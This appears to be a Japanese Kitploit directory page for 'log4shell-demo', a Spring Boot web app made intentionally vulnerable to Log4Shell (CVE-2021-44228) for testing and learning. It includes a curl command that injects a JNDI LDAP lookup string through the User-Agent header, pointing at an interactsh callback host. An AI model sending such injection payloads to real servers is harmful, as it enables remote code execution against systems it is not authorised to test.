Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4shell-demo — Log4Shell(CVE-2021-44228)に対して脆弱なシンプルなWebアプリケーション | Kitploit
ツール/GitHubGitHub/korteke/log4shell-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubkorteke/log4shell-demo

log4shell-demo

Log4Shell(CVE-2021-44228)に対して脆弱なシンプルなWebアプリケーション

リポジトリを見る
2424年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell (CVE-2021-44228) に対して脆弱なシンプルなSpring Bootアプリケーション

  • デフォルトのロギングフレームワークをlogbackからlog4j2に変更

アプリケーションは'User-Agent'ヘッダーをログに記録するため、curlと、例えば interactsh-service を使用して脆弱性をテストできます。

root@kitploit:~
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/

app.interactsh.com でDNSインタラクションが確認できるはずです。

Docker hub

Docker hub へのリンク

ツールをダウンロード